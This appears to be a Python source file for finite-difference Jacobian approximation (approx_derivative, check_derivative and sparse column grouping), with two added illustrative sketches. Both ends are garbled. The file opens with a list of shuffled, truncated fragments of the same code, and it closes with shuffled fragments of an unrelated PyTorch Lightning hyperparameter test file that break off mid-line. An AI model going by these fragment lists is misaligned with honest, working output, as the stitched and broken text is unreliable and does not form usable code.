- lb upper_dist = ub - x0 if", "fun(x) - f0 return df / dx elif method ==", "f1 = fun(x1) f2 = fun(x2) df = f2 -", "range(h.size): if method == '2-point': x = x0 + h_vecs[i]", ">>> >>> x0 = np.array([1.0, 0.5 * np.pi]) >>> check_derivative(f,", "optional Lower and upper bounds on independent variables. Defaults to", "= use_one_sided[j] df = np.empty(m) rows = i[mask] df[rows] =", "groups : ndarray of int, shape (n,) Contains values from", "- '3-point' - use central difference in interior points and", "computations two ingredients are required: * structure : array_like or", "the following: a) It handles a case of gradient computation", "order] if issparse(A): groups = group_sparse(m, n, A.indices, A.indptr) else:", "vector-valued function. If a function maps from R^n to R^m,", "df = -3.0 * f0 + 4 * f1 -", "must be array_like or sparse matrix with an appropriate shape.", "plane. Otherwise, produces bogus results. 
rel_step : None or array_like,", "np.any((x0 < lb) | (x0 > ub)): raise ValueError(\"`x0` violates", "the fraction. We store i, j and # fractions as", "ub.shape != x0.shape: raise ValueError(\"Inconsistent shapes between bounds and `x0`.\")", "f0.size n = x0.size J_transposed = np.empty((n, m)) h_vecs =", "be used to limit the region of function evaluation. In", "higher than 1 and absolute errors for elements with absolute", "---------- x0 : ndarray, shape (n,) Point at which we", "e if method == '2-point': x = x0 + h_vec", "Bounds can be used to limit the region of function", "with absolute values less or equal than 1. If `accuracy`", ": array_like of shape (n,) or float Point at which", "h.copy() lower_dist = x0 - lb upper_dist = ub -", "def _prepare_bounds(bounds, x0): lb, ub = [np.asarray(b, dtype=float) for b", "1 return rel_step * sign_x0 * np.maximum(1.0, np.abs(x0)) def _prepare_bounds(bounds,", "(default), a standard dense differencing will be used. Note, that", "x = x0 + dx*p*1.j f1 = fun(x) df =", "columns which correspond to perturbed # variables. cols, = np.nonzero(e)", "(n,), but does not allow direct access to individual elements", "must be '1-sided' or '2-sided'.\") if np.all((lb == -np.inf) &", "(Jacobian or gradient) by comparison with a finite difference approximation.", "range of function evaluation. args, kwargs : tuple and dict,", "..sparse import issparse, csc_matrix, csr_matrix, coo_matrix, find from ._group_columns import", "= find(structure[:, cols]) # Restore column indices in the full", "method to use: - '2-point' - use the first order", "num_steps h_adjusted = h.copy() lower_dist = x0 - lb upper_dist", "= _prepare_bounds(bounds, x0) if lb.shape != x0.shape or ub.shape !=", "def jac(x, c1, c2): ... return np.array([ ... [np.sin(c1 *", "evaluation. Bounds checking is not implemented when `as_linear_operator` is True.", "def _compute_absolute_step(rel_step, x0, method): if rel_step is None: rel_step =", "calling signature is ``fun(x, *args, **kwargs)`` and the same for", "h_vec = h * e if method == '2-point': x", "matrix of shape (m, n). A zero element means that", "\"\"\" J_to_test = jac(x0, *args, **kwargs) if issparse(J_to_test): J_diff =", "backward = (upper_dist < lower_dist) & ~central h_adjusted[backward] = -np.minimum(", "to R^m, its derivatives form m-by-n matrix called the Jacobian,", "a vector-valued function. If a function maps from R^n to", "a sparse matrix is interpreted as a sparsity structure, and", "+ dx*p*1.j f1 = fun(x) df = f1.imag return df", "= h_vecs[i, i] else: raise RuntimeError(\"Never be here.\") J_transposed[i] =", ": 2-tuple of array_like, optional Lower and upper bounds on", "= fun(x) - f0 # The result is written to", "we need to evaluate f(x0 + 2 * h) or", "means that a corresponding element of the Jacobian identically equals", "differencing when m=1 Jacobian is returned with a shape (n,),", "dense differencing will be used. Note, that sparse differencing makes", "= use_one_sided & e x1[mask_1] += h_vec[mask_1] x2[mask_1] += 2", "= _adjust_scheme_to_bounds( x0, h, 1, '1-sided', lb, ub) elif method", "'2-point': x = x0 + h_vecs[i] dx = x[i] -", "estimate the derivatives. Float will be converted to a 1-D", "groups : array_like of shape (n,). 
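# Illustrative sketch, not part of the original module: for a banded
# sparsity pattern the number of groups found by `group_columns` is governed
# by the bandwidth, not by n, which is what makes sparse differencing
# economical. The tridiagonal pattern below is a hypothetical example.
def _group_columns_demo(n=30):
    pattern = (np.abs(np.subtract.outer(np.arange(n), np.arange(n))) <= 1)
    groups = group_columns(pattern.astype(int))
    # Two columns share a group only if no row has non-zeros in both, so a
    # tridiagonal pattern needs only a handful of groups however large n is.
    return np.max(groups) + 1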
def approx_derivative(fun, x0, method='3-point', rel_step=None, f0=None,
                      bounds=(-np.inf, np.inf), sparsity=None,
                      as_linear_operator=False, args=(), kwargs={}):
    """Compute finite difference approximation of the derivatives of a
    vector-valued function.

    If a function maps from R^n to R^m, its derivatives form m-by-n matrix
    called the Jacobian, where an element (i, j) is a partial derivative of
    f[i] with respect to x[j].

    Parameters
    ----------
    fun : callable
        Function of which to estimate the derivatives. The argument x
        passed to this function is ndarray of shape (n,) (never a scalar
        even if n=1). It must return 1-D array_like of shape (m,) or a
        scalar.
    x0 : array_like of shape (n,) or float
        Point at which to estimate the derivatives. Float will be converted
        to a 1-D array.
    method : {'3-point', '2-point', 'cs'}, optional
        Finite difference method to use:
            - '2-point' - use the first order accuracy forward or backward
                          difference.
            - '3-point' - use central difference in interior points and the
                          second order accuracy forward or backward
                          difference near the boundary.
            - 'cs' - use a complex-step finite difference scheme. This
                     assumes that the user function is real-valued and can
                     be evaluated with complex numbers, so that the function
                     is analytic in the complex plane. Otherwise, produces
                     bogus results.
    rel_step : None or array_like, optional
        Relative step size to use. The absolute step size is computed as
        ``h = rel_step * sign(x0) * max(1, abs(x0))``, possibly adjusted to
        fit into the bounds. For ``method='3-point'`` the sign of `h` is
        ignored. If None (default) then step is selected automatically,
        see Notes.
    f0 : None or array_like, optional
        If not None it is assumed to be equal to ``fun(x0)``, in this case
        the ``fun(x0)`` is not called. Default is None.
    bounds : tuple of array_like, optional
        Lower and upper bounds on independent variables. Defaults to no
        bounds. Each bound must match the size of `x0` or be a scalar, in
        the latter case the bound will be the same for all variables.
        Bounds can be used to limit the range of function evaluation.
        Bounds checking is not implemented when `as_linear_operator` is
        True.
    sparsity : {None, array_like, sparse matrix, 2-tuple}, optional
        Defines a sparsity structure of the Jacobian matrix. If the
        Jacobian matrix is known to have only few non-zero elements in
        each row, then it's possible to estimate its several columns by a
        single function evaluation [3]_. To perform such economic
        computations two ingredients are required:

        * structure : array_like or sparse matrix of shape (m, n). A zero
          element means that a corresponding element of the Jacobian
          identically equals to zero.
        * groups : array_like of shape (n,). A column grouping for a given
          sparsity structure, use `group_columns` to obtain it.

        A single array or a sparse matrix is interpreted as a sparsity
        structure, and groups are computed inside the function. A tuple is
        interpreted as (structure, groups). If None (default), a standard
        dense differencing will be used.

        Note, that sparse differencing makes sense only when the number of
        groups is significantly less than ``n``.
    as_linear_operator : bool, optional
        When True the function returns an
        `scipy.sparse.linalg.LinearOperator`. Otherwise it returns a dense
        array or a sparse matrix depending on `sparsity`. The linear
        operator provides an efficient way of computing ``J.dot(p)`` for
        any vector ``p`` of shape (n,), but does not allow direct access
        to individual elements of the matrix. By default
        `as_linear_operator` is False.
    args, kwargs : tuple and dict, optional
        Additional arguments passed to `fun`. Both empty by default.
        The calling signature is ``fun(x, *args, **kwargs)``.

    Returns
    -------
    J : {ndarray, sparse matrix, LinearOperator}
        Finite difference approximation of the Jacobian matrix. If
        `as_linear_operator` is True returns a LinearOperator with shape
        (m, n). Otherwise it returns a dense array or a sparse matrix
        depending on how `sparsity` is defined. If `sparsity` is None then
        a ndarray with shape (m, n) is returned. If `sparsity` is not None
        returns a csr_matrix with shape (m, n). Sparse matrices and linear
        operators are always returned as a 2-D structure; for ndarrays,
        if m=1 the Jacobian is returned as a 1-D gradient array with shape
        (n,). Our motivation is the following: a) It handles a case of
        gradient computation (m=1) in a conventional way. b) It clearly
        separates these two different cases.

    See Also
    --------
    check_derivative : Check correctness of a function computing
                       derivatives.

    Notes
    -----
    If `rel_step` is not provided, it assigned to ``EPS**(1/s)``, where EPS
    is machine epsilon for float64 numbers, s=2 for '2-point' method and
    s=3 for '3-point' method. Such relative step approximately minimizes
    a sum of truncation and round-off errors, see [1]_.

    A finite difference scheme for '3-point' method is selected
    automatically. The well-known central difference scheme is used for
    points sufficiently far from the boundary, and 3-point forward or
    backward scheme is used for points near the boundary. Both schemes
    have the second-order accuracy in terms of Taylor expansion. The
    one-sided variants follow the formulas of 3-point forward and backward
    difference schemes [2]_.

    References
    ----------
    .. [1] W. H. Press et al., "Numerical Recipes. The Art of Scientific
           Computing. 3rd edition", sec. 5.7.
    .. [2] B. Fornberg, "Generation of Finite Difference Formulas on
           Arbitrarily Spaced Grids", Mathematics of Computation 51, 1988.
    .. [3] A. Curtis, M. J. D. Powell, and J. Reid, "On the estimation of
           sparse Jacobian matrices", Journal of the Institute of
           Mathematics and its Applications, 13 (1974), pp. 117-120.

    Examples
    --------
    >>> import numpy as np
    >>> from scipy.optimize import approx_derivative
    >>>
    >>> def f(x, c1, c2):
    ...     return np.array([x[0] * np.sin(c1 * x[1]),
    ...                      x[0] * np.cos(c2 * x[1])])
    ...
    >>> x0 = np.array([1.0, 0.5 * np.pi])
    >>> approx_derivative(f, x0, args=(1, 2))
    array([[ 1.,  0.],
           [-1.,  0.]])

    Bounds can be used to limit the region of function evaluation.
    In the example below we compute left and right derivative at
    point 1.0.

    >>> def g(x):
    ...     return x**2 if x >= 1 else x
    ...
    >>> x0 = 1.0
    >>> approx_derivative(g, x0, bounds=(-np.inf, 1.0))
    array([ 1.])
    >>> approx_derivative(g, x0, bounds=(1.0, np.inf))
    array([ 2.])
    """
    if method not in ['2-point', '3-point', 'cs']:
        raise ValueError("Unknown method '%s'. " % method)

    x0 = np.atleast_1d(x0)
    if x0.ndim > 1:
        raise ValueError("`x0` must have at most 1 dimension.")

    lb, ub = _prepare_bounds(bounds, x0)

    if lb.shape != x0.shape or ub.shape != x0.shape:
        raise ValueError("Inconsistent shapes between bounds and `x0`.")

    if as_linear_operator and not (np.all(np.isinf(lb))
                                   and np.all(np.isinf(ub))):
        raise ValueError("Bounds not supported when "
                         "`as_linear_operator` is True.")

    def fun_wrapped(x):
        f = np.atleast_1d(fun(x, *args, **kwargs))
        if f.ndim > 1:
            raise RuntimeError("`fun` return value has "
                               "more than 1 dimension.")
        return f

    if f0 is None:
        f0 = fun_wrapped(x0)
    else:
        f0 = np.atleast_1d(f0)
        if f0.ndim > 1:
            raise ValueError("`f0` passed has more than 1 dimension.")

    if np.any((x0 < lb) | (x0 > ub)):
        raise ValueError("`x0` violates bound constraints.")

    if as_linear_operator:
        if rel_step is None:
            rel_step = relative_step[method]

        return _linear_operator_difference(fun_wrapped, x0,
                                           f0, rel_step, method)
    else:
        h = _compute_absolute_step(rel_step, x0, method)

        if method == '2-point':
            h, use_one_sided = _adjust_scheme_to_bounds(
                x0, h, 1, '1-sided', lb, ub)
        elif method == '3-point':
            h, use_one_sided = _adjust_scheme_to_bounds(
                x0, h, 1, '2-sided', lb, ub)
        elif method == 'cs':
            use_one_sided = False

        if sparsity is None:
            return _dense_difference(fun_wrapped, x0, f0, h,
                                     use_one_sided, method)
        else:
            if not issparse(sparsity) and len(sparsity) == 2:
                structure, groups = sparsity
            else:
                structure = sparsity
                groups = group_columns(sparsity)

            if issparse(structure):
                structure = csc_matrix(structure)
            else:
                structure = np.atleast_2d(structure)

            groups = np.atleast_1d(groups)
            return _sparse_difference(fun_wrapped, x0, f0, h,
                                      use_one_sided, structure,
                                      groups, method)


def _linear_operator_difference(fun, x0, f0, h, method):
    m = f0.size
    n = x0.size

    if method == '2-point':
        def matvec(p):
            if np.array_equal(p, np.zeros_like(p)):
                return np.zeros(m)
            dx = h / norm(p)
            x = x0 + dx*p
            df = fun(x) - f0
            return df / dx

    elif method == '3-point':
        def matvec(p):
            if np.array_equal(p, np.zeros_like(p)):
                return np.zeros(m)
            dx = 2*h / norm(p)
            x1 = x0 - (dx/2)*p
            x2 = x0 + (dx/2)*p
            f1 = fun(x1)
            f2 = fun(x2)
            df = f2 - f1
            return df / dx

    elif method == 'cs':
        def matvec(p):
            if np.array_equal(p, np.zeros_like(p)):
                return np.zeros(m)
            dx = h / norm(p)
            x = x0 + dx*p*1.j
            f1 = fun(x)
            df = f1.imag
            return df / dx

    else:
        raise RuntimeError("Never be here.")

    return LinearOperator((m, n), matvec)


def _dense_difference(fun, x0, f0, h, use_one_sided, method):
    m = f0.size
    n = x0.size
    J_transposed = np.empty((n, m))
    h_vecs = np.diag(h)

    for i in range(h.size):
        if method == '2-point':
            x = x0 + h_vecs[i]
            dx = x[i] - x0[i]  # Recompute dx as exactly representable number.
            df = fun(x) - f0
        elif method == '3-point' and use_one_sided[i]:
            x1 = x0 + h_vecs[i]
            x2 = x0 + 2 * h_vecs[i]
            dx = x2[i] - x0[i]
            f1 = fun(x1)
            f2 = fun(x2)
            df = -3.0 * f0 + 4 * f1 - f2
        elif method == '3-point' and not use_one_sided[i]:
            x1 = x0 - h_vecs[i]
            x2 = x0 + h_vecs[i]
            dx = x2[i] - x1[i]
            f1 = fun(x1)
            f2 = fun(x2)
            df = f2 - f1
        elif method == 'cs':
            f1 = fun(x0 + h_vecs[i]*1.j)
            df = f1.imag
            dx = h_vecs[i, i]
        else:
            raise RuntimeError("Never be here.")

        J_transposed[i] = df / dx

    if m == 1:
        J_transposed = np.ravel(J_transposed)

    return J_transposed.T


def _sparse_difference(fun, x0, f0, h, use_one_sided,
                       structure, groups, method):
    m = f0.size
    n = x0.size
    row_indices = []
    col_indices = []
    fractions = []

    n_groups = np.max(groups) + 1
    for group in range(n_groups):
        # Perturb variables which are in the same group simultaneously.
        e = np.equal(group, groups)
        h_vec = h * e
        if method == '2-point':
            x = x0 + h_vec
            dx = x - x0
            df = fun(x) - f0
            # The result is written to columns which correspond to
            # perturbed variables.
            cols, = np.nonzero(e)
            # Find all non-zero elements in selected columns of Jacobian.
            i, j, _ = find(structure[:, cols])
            # Restore column indices in the full array.
            j = cols[j]
        elif method == '3-point':
            # Here we do conceptually the same but separate one-sided
            # and two-sided schemes.
            x1 = x0.copy()
            x2 = x0.copy()

            mask_1 = use_one_sided & e
            x1[mask_1] += h_vec[mask_1]
            x2[mask_1] += 2 * h_vec[mask_1]

            mask_2 = ~use_one_sided & e
            x1[mask_2] -= h_vec[mask_2]
            x2[mask_2] += h_vec[mask_2]

            dx = np.zeros(n)
            dx[mask_1] = x2[mask_1] - x0[mask_1]
            dx[mask_2] = x2[mask_2] - x1[mask_2]

            f1 = fun(x1)
            f2 = fun(x2)

            cols, = np.nonzero(e)
            i, j, _ = find(structure[:, cols])
            j = cols[j]

            mask = use_one_sided[j]
            df = np.empty(m)

            rows = i[mask]
            df[rows] = -3 * f0[rows] + 4 * f1[rows] - f2[rows]

            rows = i[~mask]
            df[rows] = f2[rows] - f1[rows]
        elif method == 'cs':
            f1 = fun(x0 + h_vec*1.j)
            df = f1.imag
            dx = h_vec
            cols, = np.nonzero(e)
            i, j, _ = find(structure[:, cols])
            j = cols[j]
        else:
            raise RuntimeError("Never be here.")

        # All that's left is to compute the fraction. We store i, j and
        # fractions as separate arrays and later construct coo_matrix.
        row_indices.append(i)
        col_indices.append(j)
        fractions.append(df[i] / dx[j])

    row_indices = np.hstack(row_indices)
    col_indices = np.hstack(col_indices)
    fractions = np.hstack(fractions)
    J = coo_matrix((fractions, (row_indices, col_indices)), shape=(m, n))
    return csr_matrix(J)


def check_derivative(fun, jac, x0, bounds=(-np.inf, np.inf), args=(),
                     kwargs={}):
    """Check correctness of a function computing derivatives (Jacobian or
    gradient) by comparison with a finite difference approximation.

    Parameters
    ----------
    fun : callable
        Function of which to estimate the derivatives. The argument x
        passed to this function is ndarray of shape (n,) (never a scalar
        even if n=1). It must return 1-D array_like of shape (m,) or a
        scalar.
    jac : callable
        Function which computes Jacobian matrix of `fun`. It must work
        with argument x the same way as `fun`. The return value must be
        array_like or sparse matrix with an appropriate shape.
    x0 : array_like of shape (n,) or float
        Point at which to estimate the derivatives. Float will be converted
        to 1-D array.
    bounds : 2-tuple of array_like, optional
        Lower and upper bounds on independent variables. Defaults to no
        bounds. Each bound must match the size of `x0` or be a scalar, in
        the latter case the bound will be the same for all variables.
        Bounds can be used to limit the range of function evaluation.
    args, kwargs : tuple and dict, optional
        Additional arguments passed to `fun` and `jac`. Both empty by
        default. The calling signature is ``fun(x, *args, **kwargs)`` and
        the same for `jac`.

    Returns
    -------
    accuracy : float
        The maximum among all relative errors for elements with absolute
        values higher than 1 and absolute errors for elements with
        absolute values less or equal than 1. If `accuracy` is on the
        order of 1e-6 or lower, then it is likely that your `jac`
        implementation is correct.

    See Also
    --------
    approx_derivative : Compute finite difference approximation of
                        derivative.

    Examples
    --------
    >>> import numpy as np
    >>> from scipy.optimize import check_derivative
    >>>
    >>>
    >>> def f(x, c1, c2):
    ...     return np.array([x[0] * np.sin(c1 * x[1]),
    ...                      x[0] * np.cos(c2 * x[1])])
    ...
    >>> def jac(x, c1, c2):
    ...     return np.array([
    ...         [np.sin(c1 * x[1]),  c1 * x[0] * np.cos(c1 * x[1])],
    ...         [np.cos(c2 * x[1]), -c2 * x[0] * np.sin(c2 * x[1])]
    ...     ])
    ...
    >>>
    >>> x0 = np.array([1.0, 0.5 * np.pi])
    >>> check_derivative(f, jac, x0, args=(1, 2))
    2.4492935982947064e-16
    """
    J_to_test = jac(x0, *args, **kwargs)
    if issparse(J_to_test):
        J_diff = approx_derivative(fun, x0, bounds=bounds,
                                   sparsity=J_to_test,
                                   args=args, kwargs=kwargs)
        J_to_test = csr_matrix(J_to_test)
        abs_err = J_to_test - J_diff
        i, j, abs_err_data = find(abs_err)
        J_diff_data = np.asarray(J_diff[i, j]).ravel()
        return np.max(np.abs(abs_err_data) /
                      np.maximum(1, np.abs(J_diff_data)))
    else:
        J_diff = approx_derivative(fun, x0, bounds=bounds,
                                   args=args, kwargs=kwargs)
        abs_err = np.abs(J_to_test - J_diff)
        return np.max(abs_err / np.maximum(1, np.abs(J_diff)))
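# Illustrative sketch, not part of the original module: the full sparse
# differencing pipeline on the tridiagonal pattern from the sketch above.
# `_tridiag_fun` is a hypothetical example function; its Jacobian has 2 on
# the diagonal and -1 on the off-diagonals, and the number of extra function
# evaluations scales with the number of groups (a handful) rather than n.
def _sparse_jacobian_demo(n=100):
    def _tridiag_fun(x):
        f = 2.0 * x
        f[:-1] -= x[1:]
        f[1:] -= x[:-1]
        return f

    structure = (np.abs(np.subtract.outer(np.arange(n),
                                          np.arange(n))) <= 1).astype(int)
    groups = group_columns(structure)
    # Returns a csr_matrix because `sparsity` is given.
    return approx_derivative(_tridiag_fun, np.ones(n),
                             sparsity=(structure, groups))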
[ "2.0 (the \"License\"); # you may not use this file", "# ------------------------- def test_class_nesting(): class MyModule(LightningModule): def forward(self): ... #", "can overwrite whatever we want raw_checkpoint_path = _raw_checkpoint_path(trainer) model =", "Trainer, LightningModule from pytorch_lightning.core.saving import save_hparams_to_yaml, load_hparams_from_yaml from pytorch_lightning.utilities import", "the constructor \"\"\" extra_args = {} if cls is AggSubClassEvalModel:", "any argument in init.\"\"\" model = cls() trainer = Trainer(", "= MyModule() _ = a.hparams def test2(self): test_outside() test_outside() A().test2()", "test_model_with_fsspec_as_parameter(tmpdir): model = UnsafeParamModel(LocalFileSystem(tmpdir)) trainer = Trainer( default_root_dir=tmpdir, limit_train_batches=2, limit_val_batches=2,", "1), **kwargs): super().__init__(**kwargs) assert not is_picklable(pickle_me) self.save_hyperparameters() def test_hparams_pickle_warning(tmpdir): model", "test_model_ignores_non_exist_kwargument(tmpdir): \"\"\"Test that the model takes only valid class arguments.\"\"\"", "explicit setter \"\"\" def __init__(self, hparams): super().__init__() self.hparams = hparams", "training_step(self, batch, batch_nb): x, y = batch loss = F.cross_entropy(self(x),", "import LocalFileSystem from omegaconf import OmegaConf, Container from torch.nn import", "correct values trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) trainer.fit(model) raw_checkpoint_path =", "non_exist_kwarg=99) assert 'non_exist_kwarg' not in model.hparams class SuperClassPositionalArgs(EvalModelTemplate): def __init__(self,", "AnotherArgModel(EvalModelTemplate): def __init__(self, arg1): super().__init__() self.save_hyperparameters(arg1) class OtherArgsModel(EvalModelTemplate): def __init__(self,", "arg1 = 'overwritten' local_var = 1234 self.save_hyperparameters() # this is", "import Trainer, LightningModule from pytorch_lightning.core.saving import save_hparams_to_yaml, load_hparams_from_yaml from pytorch_lightning.utilities", "\"\"\" Tests that a model can take an object \"\"\"", "not call self.save_hyperparameters() self.hparams = hparams class SubClassVarArgs(SuperClassPositionalArgs): \"\"\" Loading", "config): # \"\"\" Test that the model automatically saves the", "is AggSubClassEvalModel: extra_args.update(my_loss=torch.nn.CosineEmbeddingLoss()) elif cls is DictConfSubClassEvalModel: extra_args.update(dict_conf=OmegaConf.create(dict(my_param='anything'))) model =", "cls(config) # # # no matter how you do it,", "super().__init__() self._hparams = None # pretend EvalModelTemplate did not call", "= hparams # ------------------------- # STANDARD TESTS # ------------------------- def", "isinstance(model2.hparams, Container) # config specific tests assert model2.hparams.test_arg == 14", "assert not is_picklable(pickle_me) self.save_hyperparameters() def test_hparams_pickle_warning(tmpdir): model = UnpickleableArgsEvalModel() trainer", "verify we can train trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) trainer.fit(model)", "we can train trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) trainer.fit(model) #", "__init__(self, *args, dict_conf=OmegaConf.create(dict(my_param='something')), **kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() @pytest.mark.parametrize(\"cls\", [ EvalModelTemplate,", "'overwritten' local_var = 1234 super().__init__(*args, **kwargs) # this is intentionally", "License for the specific 
language governing permissions and # limitations", "15 # verify that the checkpoint saved the correct values", "assert model.hparams.dict_conf['my_param'] == 'anything' # verify that we can overwrite", "batch_size=99) assert model.hparams.batch_size == 99 def _raw_checkpoint_path(trainer) -> str: raw_checkpoint_paths", "2 # @pytest.mark.parametrize(\"cls,config\", [ # (SaveHparamsModel, Namespace(my_arg=42)), # (SaveHparamsModel, dict(my_arg=42)),", "cls is DictConfSubClassEvalModel: extra_args.update(dict_conf=OmegaConf.create(dict(my_param='anything'))) model = cls(**extra_args) assert model.hparams.batch_size ==", "(AssignHparamsModel, dict(my_arg=42)), # (AssignHparamsModel, OmegaConf.create(dict(my_arg=42))), # ]) # def test_single_config_models(tmpdir,", "train trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) # make sure the", "takes positional arg, subclass takes varargs. \"\"\" hparams = dict(test=1)", "model loads correctly model = cls.load_from_checkpoint(raw_checkpoint_path) assert model.hparams.batch_size == 179", "pickle from argparse import Namespace import cloudpickle import pytest import", "we can overwrite whatever we want model = cls.load_from_checkpoint(raw_checkpoint_path, batch_size=99)", "nn.Module a = MyModule() assert isinstance(a, torch.nn.Module) def test_outside(): a", "model2 = EvalModelTemplate.load_from_checkpoint(raw_checkpoint_path) assert model2.hparams.batch_size == -17 def test_hparams_pickle(tmpdir): ad", "os.path.join(trainer.checkpoint_callback.dirpath, raw_checkpoint_path) return raw_checkpoint_path class LocalVariableModelSuperLast(EvalModelTemplate): \"\"\" This model has", "overfit_batches=2) trainer.fit(model) # make sure the raw checkpoint saved the", "__init__(self, hparams): super().__init__() self._hparams = None # pretend EvalModelTemplate did", "= _raw_checkpoint_path(trainer) raw_checkpoint = torch.load(raw_checkpoint_path) raw_checkpoint[past_key] = raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] raw_checkpoint['hparams_type'] =", "should accept hparams and init in the super class \"\"\"", "\"\"\" def __init__(self, arg1, arg2, *args, **kwargs): self.argument1 = arg1", "= cls.load_from_checkpoint(raw_checkpoint_path, batch_size=99) assert model.hparams.batch_size == 99 def _raw_checkpoint_path(trainer) ->", "# STANDARD TESTS # ------------------------- def _run_standard_hparams_test(tmpdir, model, cls, try_overwrite=False):", "__init__(self, arg1): super().__init__() self.save_hyperparameters(arg1) class OtherArgsModel(EvalModelTemplate): def __init__(self, arg1, arg2):", "setter \"\"\" def __init__(self, hparams): super().__init__() self.hparams = hparams #", "cls, try_overwrite=False): \"\"\" Tests for the existence of an arg", "= cls(hparams=conf) assert isinstance(model.hparams, Container) # run standard test suite", "call at the end. 
\"\"\" def __init__(self, arg1, arg2, *args,", "for the existence of an arg 'test_arg=14' \"\"\" hparam_type =", "-1 model.hparams = Namespace(abc=42) assert model.hparams.abc == 42 trainer =", "max_epochs=1, overfit_batches=2) trainer.fit(model) # make sure the raw checkpoint saved", "initial hparams, no other runtime change allowed\"\"\" model = cls(running_arg=123)", "== 15.4 def test_explicit_args_hparams(tmpdir): \"\"\" Tests that a model can", "the model takes only valid class arguments.\"\"\" class LocalModel(EvalModelTemplate): def", "anystr='abcd')) path_yaml = os.path.join(tmpdir, 'testing-hparams.yaml') save_hparams_to_yaml(path_yaml, hparams) assert load_hparams_from_yaml(path_yaml) ==", "class UnpickleableArgsEvalModel(EvalModelTemplate): \"\"\" A model that has an attribute that", "test_hparams_save_yaml(tmpdir): hparams = dict(batch_size=32, learning_rate=0.001, data_root='./any/path/here', nasted=dict(any_num=123, anystr='abcd')) path_yaml =", "test_step(self, batch, batch_nb): x, y = batch loss = F.cross_entropy(self(x),", "values # trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) # trainer.fit(model) #", "cls(running_arg=123) assert model.hparams.running_arg == 123 model.hparams.running_arg = -1 assert model.hparams.running_arg", "default_root_dir=tmpdir, limit_train_batches=2, limit_val_batches=2, limit_test_batches=2, max_epochs=1, ) trainer.fit(model) path_yaml = os.path.join(trainer.logger.log_dir,", "**kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() class UnconventionalArgsEvalModel(EvalModelTemplate): \"\"\" A model that", "OF ANY KIND, either express or implied. # See the", "= cls.load_from_checkpoint(raw_checkpoint_path) assert model.hparams.batch_size == 179 if isinstance(model, AggSubClassEvalModel): assert", "passing unsupported config type. 
\"\"\" with pytest.raises(ValueError): _ = cls(**config)", "run standard test suite raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model, LocalModel) model", "See the License for the specific language governing permissions and", "14 # verify we can train trainer = Trainer(default_root_dir=tmpdir, max_epochs=2,", "to in writing, software # distributed under the License is", "model = cls(hparams={'test_arg': 14}) # run standard test suite _run_standard_hparams_test(tmpdir,", "values trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) trainer.fit(model) raw_checkpoint_path = _raw_checkpoint_path(trainer)", "call self.save_hyperparameters() self.hparams = hparams class SubClassVarArgs(SuperClassPositionalArgs): \"\"\" Loading this", "OmegaConf.create(dict(test_arg=14, mylist=[15.4, dict(a=1, b=2)])) model = cls(hparams=conf) assert isinstance(model.hparams, Container)", "verify that we can overwrite whatever we want raw_checkpoint_path =", "_run_standard_hparams_test(tmpdir, model, cls, try_overwrite=False): \"\"\" Tests for the existence of", "or agreed to in writing, software # distributed under the", "= EvalModelTemplate() # verify we can train trainer = Trainer(default_root_dir=tmpdir,", "overfit_batches=0.5) trainer.fit(model) raw_checkpoint_path = _raw_checkpoint_path(trainer) raw_checkpoint = torch.load(raw_checkpoint_path) assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY", "load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, AttributeDict(hparams)) assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml,", "def test_step(self, batch, batch_nb): x, y = batch loss =", "model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=123) assert model.hparams.test_arg == 14 assert 'test_arg2'", "elif cls is DictConfSubClassEvalModel: extra_args.update(dict_conf=OmegaConf.create(dict(my_param='anything'))) model = cls(**extra_args) assert model.hparams.batch_size", "(SaveHparamsModel, OmegaConf.create(dict(my_arg=42))), # (AssignHparamsModel, Namespace(my_arg=42)), # (AssignHparamsModel, dict(my_arg=42)), # (AssignHparamsModel,", "raw checkpoint saved the properties raw_checkpoint_path = _raw_checkpoint_path(trainer) raw_checkpoint =", "= 'Namespace' raw_checkpoint[past_key]['batch_size'] = -17 del raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] # save back", "verify that model loads correctly # raw_checkpoint_path = _raw_checkpoint_path(trainer) #", "compliance with the License. 
# You may obtain a copy", "the raw checkpoint saved the properties raw_checkpoint_path = _raw_checkpoint_path(trainer) raw_checkpoint", "test_omega_conf_hparams(tmpdir, cls): # init model conf = OmegaConf.create(dict(test_arg=14, mylist=[15.4, dict(a=1,", "arg1): super().__init__() self.save_hyperparameters(arg1) class OtherArgsModel(EvalModelTemplate): def __init__(self, arg1, arg2): super().__init__()", "configure_optimizers(self): return torch.optim.Adam(self.parameters(), lr=0.02) @pytest.mark.parametrize(\"cls\", [ SimpleNoArgsModel, NoArgsSubClassEvalModel, ]) def", "we want raw_checkpoint_path = _raw_checkpoint_path(trainer) model = LocalModel.load_from_checkpoint(raw_checkpoint_path, non_exist_kwarg=99) assert", "raw_checkpoint_paths[0] raw_checkpoint_path = os.path.join(trainer.checkpoint_callback.dirpath, raw_checkpoint_path) return raw_checkpoint_path class LocalVariableModelSuperLast(EvalModelTemplate): \"\"\"", "here at the end @pytest.mark.parametrize(\"cls\", [ LocalVariableModelSuperFirst, # LocalVariableModelSuperLast, ])", "= os.path.join(tmpdir, 'testing-hparams.yaml') save_hparams_to_yaml(path_yaml, hparams) assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml,", "\"\"\" Tests that only the arguments are collected and not", "path_yaml = os.path.join(trainer.logger.log_dir, trainer.logger.NAME_HPARAMS_FILE) hparams = load_hparams_from_yaml(path_yaml) assert hparams.get('running_arg') ==", "correctly model2 = EvalModelTemplate.load_from_checkpoint(raw_checkpoint_path) assert model2.hparams.batch_size == -17 def test_hparams_pickle(tmpdir):", "not use this file except in compliance with the License.", "got an unexpected keyword argument 